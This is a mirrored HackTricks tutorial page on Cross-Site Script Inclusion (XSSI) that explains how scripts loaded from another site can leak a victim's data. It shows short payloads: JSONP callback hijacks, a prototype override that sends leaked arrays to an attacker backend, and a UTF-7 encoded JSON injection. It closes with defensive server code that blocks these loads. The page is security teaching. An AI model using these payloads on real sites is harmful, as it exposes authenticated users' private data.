mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
99 lines
7.5 KiB
Markdown
# XSSI (Cross-Site Script Inclusion)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Basic Information

**Cross-Site Script Inclusion (XSSI)** is a vulnerability that arises from the nature of the `script` tag in HTML. Unlike most resources, which are subject to the **Same-Origin Policy (SOP)**, scripts can be included from a different origin. This behaviour is intended to allow the use of libraries and other resources hosted on other servers, but it also introduces a security risk.

### Key Characteristics of **XSSI**:

- **Bypass of SOP**: Scripts are not subject to the **Same-Origin Policy**, so they can be included across origins.
- **Data Exposure**: An attacker can exploit this behaviour to read data loaded via the `script` tag.
- **Impact on Dynamic JavaScript/JSONP**: **XSSI** is particularly relevant for dynamic JavaScript or **JSON with Padding (JSONP)**. These technologies often rely on "ambient-authority" information (such as cookies) for authentication. When a script request is made to a different host, these credentials (e.g. cookies) are automatically included in the request.
- **Authentication Token Leakage**: If an attacker can trick a user's browser into requesting a script from a server they control, they may be able to obtain the sensitive information contained in these requests.

### Types

1. **Static JavaScript** - This represents the conventional form of XSSI.
2. **Static JavaScript with Authentication** - This type differs because it requires authentication to access.
3. **Dynamic JavaScript** - Involves JavaScript that generates content dynamically.
4. **Non-JavaScript** - Refers to vulnerabilities that do not involve JavaScript directly.

**The following information is a summary of [https://www.scip.ch/en/?labs.20160414](https://www.scip.ch/en/?labs.20160414)**. Check it for further details.

### Regular XSSI

In this method, private information is embedded within a globally accessible JavaScript file. Attackers can identify these files using techniques such as file reading, keyword searching, or regular expressions. Once located, the script holding the private information can be included in malicious content, allowing unauthorized access to sensitive data. An example exploitation technique is shown below:

```html
<script src="https://www.vulnerable-domain.tld/script.js"></script>
<script> alert(JSON.stringify(confidential_keys[0])); </script>
```

### Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI

These types of XSSI attacks involve confidential information being added dynamically to the script in response to a user's request. Detection can be performed by sending requests with and without cookies and comparing the responses. If the information differs, it may indicate the presence of confidential information. This process can be automated using tools like the [DetectDynamicJS](https://github.com/luh2/DetectDynamicJS) Burp extension.

If confidential data is stored in a global variable, it can be exploited using methods similar to those used in Regular XSSI. However, if the confidential data is included in a JSONP response, attackers can hijack the callback function to obtain the information. This can be done by manipulating global objects or setting up a function to be executed by the JSONP response, as shown below:

```html
<script>
var angular = function () { return 1; };
angular.callbacks = function () { return 1; };
angular.callbacks._7 = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://site.tld/p?jsonp=angular.callbacks._7" type="text/javascript"></script>
```

```html
<script>
leak = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://site.tld/p?jsonp=leak" type="text/javascript"></script>
```

For variables not residing in the global namespace, *prototype tampering* can sometimes be exploited. This technique takes advantage of JavaScript's design, where code interpretation involves traversing the prototype chain to locate the called property. By overriding certain functions, such as `Array`'s `slice`, attackers can access and leak non-global variables:

```javascript
Array.prototype.slice = function(){
// leaks ["secret1", "secret2", "secret3"]
sendToAttackerBackend(this);
};
```

Further details on attack vectors can be found in the work of Security Researcher [Sebastian Lekies](https://twitter.com/slekies), who maintains a list of [vectors](http://sebastian-lekies.de/leak/).
### Non-Script-XSSI

Takeshi Terada's research introduces another kind of XSSI, where Non-Script files, such as CSV, are leaked cross-origin by being included as sources in a `script` tag. Historical instances of XSSI, like Jeremiah Grossman's 2006 attack to read a complete Google address book and Joe Walker's 2007 JSON data leak, highlight the severity of these threats. Additionally, Gareth Heyes describes an attack variant involving UTF-7 encoded JSON to escape the JSON format and execute scripts, effective in certain browsers:

```javascript
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGUA-'}]
```

```html
<script src="http://site.tld/json-utf7.json" type="text/javascript" charset="UTF-7"></script>
```
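
Every variant above depends on the data endpoint being consumable as a script: the `<script src>` load carries the victim's cookies (dynamic/authenticated XSSI), the response body parses as JavaScript (a JSONP callback or a bare array), and in the non-script variant the attacker picks the charset. The following is an added example, not code from HackTricks or from the scip.ch article, showing a server-side guard and the matching same-origin client parser that close those three doors at once. The request and response objects are plain literals standing in for an Express-style framework and the function names are this example's own; the `Sec-Fetch-Dest`, `Sec-Fetch-Site`, `X-Content-Type-Options` and `Content-Type` headers are real browser/HTTP headers.

```javascript
// Added example (not HackTricks code): harden a JSON endpoint that serves cookie-bound data
// so that a cross-site <script src> load cannot read it. Request/response objects are plain
// literals standing in for an Express-style framework; function names are this example's own.

// Anti-XSSI prefix used by several large sites. As JavaScript it is a syntax error, so a
// <script src> load aborts before any JSONP callback runs or any global is populated.
// The same-origin client strips it before JSON.parse.
const XSSI_PREFIX = ")]}',\n";

// Lower-case header names so lookups are case-insensitive.
function lowerHeaders(headers) {
  return Object.fromEntries(
    Object.entries(headers).map(([k, v]) => [k.toLowerCase(), String(v)])
  );
}

// May this request receive data tied to the caller's cookies?
function isTrustedDataRequest(headers) {
  const h = lowerHeaders(headers);
  // Fetch Metadata: a <script src> load arrives as sec-fetch-dest: script, and any
  // cross-site load arrives as sec-fetch-site: cross-site. Reject both outright.
  if (h['sec-fetch-dest'] === 'script') return false;
  if (h['sec-fetch-site'] === 'cross-site') return false;
  // Defence in depth for clients without Fetch Metadata: a <script> tag cannot attach a
  // custom header, and a cross-origin fetch/XHR that sets one triggers a CORS preflight
  // that this server does not answer.
  return h['x-requested-with'] === 'XMLHttpRequest';
}

// Build the response. JSONP callbacks are deliberately unsupported: a callback parameter
// turns the body into executable script, which is exactly the XSSI sink.
function buildJsonResponse(data, requestHeaders) {
  const headers = {
    // Explicit charset overrides any charset="UTF-7" attribute on a <script> tag;
    // never serve data as text/javascript.
    'Content-Type': 'application/json; charset=utf-8',
    // Browsers refuse to execute a nosniff response with a non-JavaScript MIME type
    // as a script, and stop sniffing the content/charset the UTF-7 variant relies on.
    'X-Content-Type-Options': 'nosniff',
    'Cache-Control': 'no-store',
  };
  if (!isTrustedDataRequest(requestHeaders)) {
    return { status: 403, headers, body: '' };
  }
  return { status: 200, headers, body: XSSI_PREFIX + JSON.stringify(data) };
}

// Same-origin client (fetch/XHR): strip the prefix, then parse as data, never eval.
function parseGuardedJson(body) {
  if (!body.startsWith(XSSI_PREFIX)) {
    throw new Error('response is missing the anti-XSSI prefix');
  }
  return JSON.parse(body.slice(XSSI_PREFIX.length));
}

// Check helper: could a browser parse this body as a script at all? new Function only
// compiles, nothing is executed. A bare JSON array is valid JavaScript, which is why
// arrays and JSONP bodies are readable through a <script> tag.
function bodyParsesAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Check helper: does a response carry the headers that block the non-script/UTF-7 variant?
function headersBlockScriptInclusion(headers) {
  const h = lowerHeaders(headers);
  const ct = (h['content-type'] || '').toLowerCase();
  const notScriptMime = ct.startsWith('application/json');
  const explicitCharset = /;\s*charset=utf-8/.test(ct);
  const nosniff = h['x-content-type-options'] === 'nosniff';
  return notScriptMime && explicitCharset && nosniff;
}

// Constructed sample requests: a cross-site <script src> load versus a same-origin XHR.
const scriptTagRequest = { 'Sec-Fetch-Dest': 'script', 'Sec-Fetch-Site': 'cross-site' };
const sameOriginXhr = {
  'Sec-Fetch-Dest': 'empty',
  'Sec-Fetch-Site': 'same-origin',
  'X-Requested-With': 'XMLHttpRequest',
};
const secret = { friend: 'luke', token: 'constructed-sample-token' };

const denied = buildJsonResponse(secret, scriptTagRequest);
const served = buildJsonResponse(secret, sameOriginXhr);
console.log(denied.status, served.status);                    // 403 200
console.log(bodyParsesAsScript(served.body));                  // false
console.log(bodyParsesAsScript(JSON.stringify(['secret1'])));  // true
console.log(parseGuardedJson(served.body).friend);            // luke
```

The three checks are independent, so a request that fails any one of them is refused even if another passes; in particular the `X-Requested-With` fallback only matters for clients that send no Fetch Metadata. Leaving JSONP out is the point rather than an omission: data bound to ambient authority (cookies) should only ever be reachable through a same-origin fetch that the page parses as JSON, not through a script load.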